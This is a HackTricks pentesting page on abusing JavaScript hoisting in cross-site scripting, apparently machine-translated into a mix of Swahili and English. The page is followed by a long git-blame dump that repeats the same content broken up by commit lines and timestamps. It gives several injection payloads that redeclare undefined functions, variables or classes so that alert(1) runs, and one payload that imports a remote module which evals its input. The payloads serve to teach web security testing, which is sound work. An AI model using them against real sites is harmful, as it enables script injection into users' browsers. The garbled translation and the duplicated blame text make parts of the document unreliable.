hacktricks/pentesting-web/xss-cross-site-scripting/js-hoisting.md

# JS Hoisting

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## Basic Information

Katika lugha ya JavaScript, mekanismu inayojulikana kama **Hoisting** inaelezewa ambapo matangazo ya mabadiliko, kazi, madarasa, au uagizaji yanaelekezwa kwa dhana juu ya wigo wao kabla ya msimbo kutekelezwa. Mchakato huu unafanywa kiotomatiki na injini ya JavaScript, ambayo inapitia skripti katika vipitisho vingi.

Wakati wa kipitisho cha kwanza, injini inachambua msimbo ili kuangalia makosa ya sintaksia na kuubadilisha kuwa mti wa sintaksia ya kiabstrakti. Awamu hii inajumuisha hoisting, mchakato ambapo matangazo fulani yanahamishwa juu ya muktadha wa utekelezaji. Ikiwa awamu ya uchambuzi inafanikiwa, ikionyesha hakuna makosa ya sintaksia, utekelezaji wa skripti unaendelea.

Ni muhimu kuelewa kwamba:

1. Skripti lazima iwe huru na makosa ya sintaksia ili utekelezaji ufanyike. Sheria za sintaksia lazima zifuatwe kwa ukamilifu.
2. Mahali pa msimbo ndani ya skripti yanaathiri utekelezaji kutokana na hoisting, ingawa msimbo uliofanywa unaweza kutofautiana na uwakilishi wake wa maandiko.

#### Types of Hoisting

Kulingana na taarifa kutoka MDN, kuna aina nne tofauti za hoisting katika JavaScript:

1. **Value Hoisting**: Inaruhusu matumizi ya thamani ya mabadiliko ndani ya wigo wake kabla ya mstari wake wa matangazo.
2. **Declaration Hoisting**: Inaruhusu kurejelea mabadiliko ndani ya wigo wake kabla ya matangazo yake bila kusababisha `ReferenceError`, lakini thamani ya mabadiliko itakuwa `undefined`.
3. Aina hii inabadilisha tabia ndani ya wigo wake kutokana na matangizo ya mabadiliko kabla ya mstari wake wa matangizo halisi.
4. Athari za upande wa matangizo hutokea kabla ya msimbo mwingine wote unaoihusisha kutathminiwa.

Kwa undani, matangizo ya kazi yanaonyesha tabia ya hoisting aina 1. Neno `var` linaonyesha tabia ya aina 2. Matangazo ya kisheria, ambayo yanajumuisha `let`, `const`, na `class`, yanaonyesha tabia ya aina 3. Mwishowe, taarifa za `import` ni za kipekee kwa kuwa zinahamishwa na tabia za aina 1 na aina 4.


## Scenarios

Hivyo ikiwa una hali ambapo unaweza **Inject JS code after an undeclared object** inatumika, unaweza **fix the syntax** kwa kutangaza (ili msimbo wako utekelezwe badala ya kutupa makosa):
```javascript
// The function vulnerableFunction is not defined
vulnerableFunction('test', '<INJECTION>');
// You can define it in your injection to execute JS
//Payload1: param='-alert(1)-'')%3b+function+vulnerableFunction(a,b){return+1}%3b
'-alert(1)-''); function vulnerableFunction(a,b){return 1};

//Payload2: param=test')%3bfunction+vulnerableFunction(a,b){return+1}%3balert(1)
test'); function vulnerableFunction(a,b){ return 1 };alert(1)
```

```javascript
// If a variable is not defined, you could define it in the injection
// In the following example var a is not defined
function myFunction(a,b){
return 1
};
myFunction(a, '<INJECTION>')

//Payload: param=test')%3b+var+a+%3d+1%3b+alert(1)%3b
test'); var a = 1; alert(1);
```

```javascript
// If an undeclared class is used, you cannot declare it AFTER being used
var variable = new unexploitableClass();
<INJECTION>
// But you can actually declare it as a function, being able to fix the syntax with something like:
function unexploitableClass() {
return 1;
}
alert(1);
```

```javascript
// Properties are not hoisted
// So the following examples where the 'cookie' attribute doesn´t exist
// cannot be fixed if you can only inject after that code:
test.cookie('leo','INJECTION')
test['cookie','injection']
```
## Mifano Mingine
```javascript
// Undeclared var accessing to an undeclared method
x.y(1,INJECTION)
// You can inject
alert(1));function x(){}//
// And execute the allert with (the alert is resolved before it's detected that the "y" is undefined
x.y(1,alert(1));function x(){}//)
```

```javascript
// Undeclared var accessing 2 nested undeclared method
x.y.z(1,INJECTION)
// You can inject
");import {x} from "https://example.com/module.js"//
// It will be executed
x.y.z("alert(1)");import {x} from "https://example.com/module.js"//")


// The imported module:
// module.js
var x = {
y: {
z: function(param) {
eval(param);
}
}
};

export { x };
```

```javascript
// In this final scenario from https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/
// It was injected the: let config;`-alert(1)`//`
// With the goal of making in the block the var config be empty, so the return is not executed
// And the same injection was replicated in the body URL to execute an alert

try {
if(config){
return;
}
// TODO handle missing config for: https://try-to-catch.glitch.me/"+`
let config;`-alert(1)`//`+"
} catch {
fetch("/error", {
method: "POST",
body: {
url:"https://try-to-catch.glitch.me/"+`
let config;`-alert(1)-`//`+""
}
})
}
```
## References

* [https://jlajara.gitlab.io/Javascript\_Hoisting\_in\_XSS\_Scenarios](https://jlajara.gitlab.io/Javascript\_Hoisting\_in\_XSS\_Scenarios)
* [https://developer.mozilla.org/en-US/docs/Glossary/Hoisting](https://developer.mozilla.org/en-US/docs/Glossary/Hoisting)
* [https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/](https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/)

{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>
{% endhint %}
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
+								# JS Hoisting
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:17:18 +00:00
+								{% hint style="success" %}
 								Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:17:18 +00:00
+								<details>
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:17:18 +00:00
+								<summary>Support HackTricks</summary>
-												arte

											
										
										
											2024-01-01 17:15:42 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:17:18 +00:00
+								* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
 								* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 								* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
 								</details>
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:17:18 +00:00
+								{% endhint %}
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:17:18 +00:00
+								## Basic Information
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:17:18 +00:00
+								Katika lugha ya JavaScript, mekanismu inayojulikana kama **Hoisting** inaelezewa ambapo matangazo ya mabadiliko, kazi, madarasa, au uagizaji yanaelekezwa kwa dhana juu ya wigo wao kabla ya msimbo kutekelezwa. Mchakato huu unafanywa kiotomatiki na injini ya JavaScript, ambayo inapitia skripti katika vipitisho vingi.
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:17:18 +00:00
+								Wakati wa kipitisho cha kwanza, injini inachambua msimbo ili kuangalia makosa ya sintaksia na kuubadilisha kuwa mti wa sintaksia ya kiabstrakti. Awamu hii inajumuisha hoisting, mchakato ambapo matangazo fulani yanahamishwa juu ya muktadha wa utekelezaji. Ikiwa awamu ya uchambuzi inafanikiwa, ikionyesha hakuna makosa ya sintaksia, utekelezaji wa skripti unaendelea.
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ni muhimu kuelewa kwamba:
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:17:18 +00:00
+. Skripti lazima iwe huru na makosa ya sintaksia ili utekelezaji ufanyike. Sheria za sintaksia lazima zifuatwe kwa ukamilifu.
 . Mahali pa msimbo ndani ya skripti yanaathiri utekelezaji kutokana na hoisting, ingawa msimbo uliofanywa unaweza kutofautiana na uwakilishi wake wa maandiko.
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:17:18 +00:00
+								#### Types of Hoisting
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:17:18 +00:00
+								Kulingana na taarifa kutoka MDN, kuna aina nne tofauti za hoisting katika JavaScript:
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:17:18 +00:00
+. **Value Hoisting**: Inaruhusu matumizi ya thamani ya mabadiliko ndani ya wigo wake kabla ya mstari wake wa matangazo.
 . **Declaration Hoisting**: Inaruhusu kurejelea mabadiliko ndani ya wigo wake kabla ya matangazo yake bila kusababisha `ReferenceError`, lakini thamani ya mabadiliko itakuwa `undefined`.
 . Aina hii inabadilisha tabia ndani ya wigo wake kutokana na matangizo ya mabadiliko kabla ya mstari wake wa matangizo halisi.
 . Athari za upande wa matangizo hutokea kabla ya msimbo mwingine wote unaoihusisha kutathminiwa.
-												a

											
										
										
											2024-02-06 03:10:38 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:17:18 +00:00
+								Kwa undani, matangizo ya kazi yanaonyesha tabia ya hoisting aina 1. Neno `var` linaonyesha tabia ya aina 2. Matangazo ya kisheria, ambayo yanajumuisha `let`, `const`, na `class`, yanaonyesha tabia ya aina 3. Mwishowe, taarifa za `import` ni za kipekee kwa kuwa zinahamishwa na tabia za aina 1 na aina 4.
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:17:18 +00:00
+								## Scenarios
 								Hivyo ikiwa una hali ambapo unaweza **Inject JS code after an undeclared object** inatumika, unaweza **fix the syntax** kwa kutangaza (ili msimbo wako utekelezwe badala ya kutupa makosa):
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
+								```javascript
 								// The function vulnerableFunction is not defined
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								vulnerableFunction('test', '<INJECTION>');
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
+								// You can define it in your injection to execute JS
 								//Payload1: param='-alert(1)-'')%3b+function+vulnerableFunction(a,b){return+1}%3b
 								'-alert(1)-''); function vulnerableFunction(a,b){return 1};
 								//Payload2: param=test')%3bfunction+vulnerableFunction(a,b){return+1}%3balert(1)
 								test'); function vulnerableFunction(a,b){ return 1 };alert(1)
 								```
 								```javascript
 								// If a variable is not defined, you could define it in the injection
 								// In the following example var a is not defined
 								function myFunction(a,b){
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								return 1
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
+								};
 								myFunction(a, '<INJECTION>')
 								//Payload: param=test')%3b+var+a+%3d+1%3b+alert(1)%3b
 								test'); var a = 1; alert(1);
 								```
 								```javascript
 								// If an undeclared class is used, you cannot declare it AFTER being used
 								var variable = new unexploitableClass();
 								<INJECTION>
 								// But you can actually declare it as a function, being able to fix the syntax with something like:
 								function unexploitableClass() {
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								return 1;
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
+								}
 								alert(1);
 								```
 								```javascript
 								// Properties are not hoisted
 								// So the following examples where the 'cookie' attribute doesn´t exist
 								// cannot be fixed if you can only inject after that code:
 								test.cookie('leo','INJECTION')
 								test['cookie','injection']
 								```
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:17:18 +00:00
+								## Mifano Mingine
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
+								```javascript
 								// Undeclared var accessing to an undeclared method
 								x.y(1,INJECTION)
 								// You can inject
 								alert(1));function x(){}//
 								// And execute the allert with (the alert is resolved before it's detected that the "y" is undefined
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								x.y(1,alert(1));function x(){}//)
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
+								```
 								```javascript
 								// Undeclared var accessing 2 nested undeclared method
 								x.y.z(1,INJECTION)
 								// You can inject
 								");import {x} from "https://example.com/module.js"//
 								// It will be executed
 								x.y.z("alert(1)");import {x} from "https://example.com/module.js"//")
 								// The imported module:
 								// module.js
 								var x = {
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								y: {
 								z: function(param) {
 								eval(param);
 								}
 								}
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
+								};
 								export { x };
 								```
 								```javascript
 								// In this final scenario from https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/
 								// It was injected the: let config;`-alert(1)`//`
 								// With the goal of making in the block the var config be empty, so the return is not executed
 								// And the same injection was replicated in the body URL to execute an alert
 								try {
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								if(config){
 								return;
 								}
 								// TODO handle missing config for: https://try-to-catch.glitch.me/"+`
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
+								let config;`-alert(1)`//`+"
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								} catch {
 								fetch("/error", {
 								method: "POST",
 								body: {
 								url:"https://try-to-catch.glitch.me/"+`
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
+								let config;`-alert(1)-`//`+""
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								}
 								})
 								}
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:17:18 +00:00
+								## References
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
 								* [https://jlajara.gitlab.io/Javascript\_Hoisting\_in\_XSS\_Scenarios](https://jlajara.gitlab.io/Javascript\_Hoisting\_in\_XSS\_Scenarios)
 								* [https://developer.mozilla.org/en-US/docs/Glossary/Hoisting](https://developer.mozilla.org/en-US/docs/Glossary/Hoisting)
 								* [https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/](https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/)
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:17:18 +00:00
+								{% hint style="success" %}
 								Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:17:18 +00:00
+								<details>
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:17:18 +00:00
+								<summary>Support HackTricks</summary>
-												arte

											
										
										
											2024-01-01 17:15:42 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:17:18 +00:00
+								* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
 								* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 								* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
-												GITBOOK-4213: change request with no subject merged in GitBook

											
										
										
											2023-12-25 17:29:41 +00:00
 								</details>
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:17:18 +00:00
+								{% endhint %}